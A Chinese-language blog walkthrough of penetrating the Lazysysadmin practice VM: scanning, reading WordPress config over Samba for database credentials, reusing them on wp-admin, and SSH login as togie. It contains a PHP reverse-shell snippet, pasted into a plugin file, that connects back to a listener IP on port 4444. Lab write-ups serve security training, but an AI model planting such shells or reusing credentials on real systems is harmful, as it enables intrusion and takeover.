当前位置: 首页 > news >正文

Lazysysadmin靶机渗透过程

准备工作

下载好靶机到本地后

VMware导入OVA

启动靶机

扫描信息

首先扫描整个C段发现主机

进一步扫描端口

从扫描结果可知:

  • Samba服务
  • MySQL
  • SSH端口
  • 网站端口

先对网站进行目录遍历

发现有wordpress网站和phpmyadmin管理系统

出现了非常多遍My name is togie.可能是个重要信息

有phpmyadmin,但不知道密码。

80端口没有更多收获,转向Samba服务

列出分享目录的列表,没有密码,直接回车

访问 share$目录

首先去查看WP的配置文件,一般里面会有连接数据库的密码

拿到数据库用户密码为Admin:TogieMYSQL12345^^

再看看有没有别的信息

服务器密码为12345,用户名未知

用刚刚拿到的密码去登phpmyadmin

成功,但无法继续操作

去试试wordpress后台

地址:/wordpress/wp-admin

复用之前的数据库账号密码试试

成功进入,随后利用插件功能执行反弹shell

首先监听上线

编辑插件,然后将我们的恶意shell粘贴进去

$sock = fsockopen("172.31.13.169", 4444); //(<监听端IP>, <监听端口>)
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); 
$process = proc_open('/bin/sh', $descriptorspec, $pipes); 
proc_close($process);

提示更新成功,接下来访问hello.php文件,位置:/wordpress/wp-content/plugins/hello.php

kail这边也成功监听到上线

查看用户看到了togie账号,结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件

猜测这是这位的账号密码,刚好开着ssh账号,试着登录。

成功上去,查看sudo权限

已有sudo权限,至此,对靶机的渗透结束

http://www.lryc.cn/news/63942.html

相关文章:

  • 为什么网络安全缺口很大,招聘却很少?
  • SpringBoot手册
  • 【Linux】如何实现单机版QQ,来看进程间通信之管道
  • 从一到无穷大 #6 盘满排查过程
  • ChatGPT技术原理 第九章:数据集和训练技巧
  • NCR被攻击后服务中断!原是BlackCat勒索软件作祟
  • 带你认识什么是BMS(电池管理系统)
  • 安装Ubuntu22.04虚拟机的一些常见问题解决方法
  • 银河麒麟操作系统,安装Gitlab 基于docker
  • 基于Python实现个人手机定位分析
  • Unity Navgation系统杂记
  • [2021.11.9]lighteffect架构优化详细设计文档
  • 经典回归算法
  • Python两三行代码轻松批量添加~防韩还是很有必要的~
  • 开心消消乐
  • 有效日志管理在软件开发和运营中的作用
  • 【五一创作】【笔记】Git|如何将仓库中所有的 commit 合成一个?又名,如何清除所有 git 提交记录?(附 git rebase 机制的简要分析)
  • 如何写出高质量代码?
  • 外卖项目优化-01-redis缓存短信验证码、菜品数据、Spring Cache(注解开发缓存)、(注解开发)缓存套餐数据
  • Chapter1:控制系统数学模型(下)
  • 排序算法总结
  • java+jsp企业物流货运快递管理系统servlet
  • 【ROS仿真实战】获取机器人在gazebo位置真值的三种方法(三)
  • Winform从入门到精通(35)——FontDialog(史上最全)
  • AcWing 854. Floyd求最短路Floyd模板
  • Graph Theory(图论)
  • [Python]生成 txt 文件
  • GeoTools实战指南: 自定义矢量样式并生成截图
  • 深度学习超参数调整介绍
  • Bootloader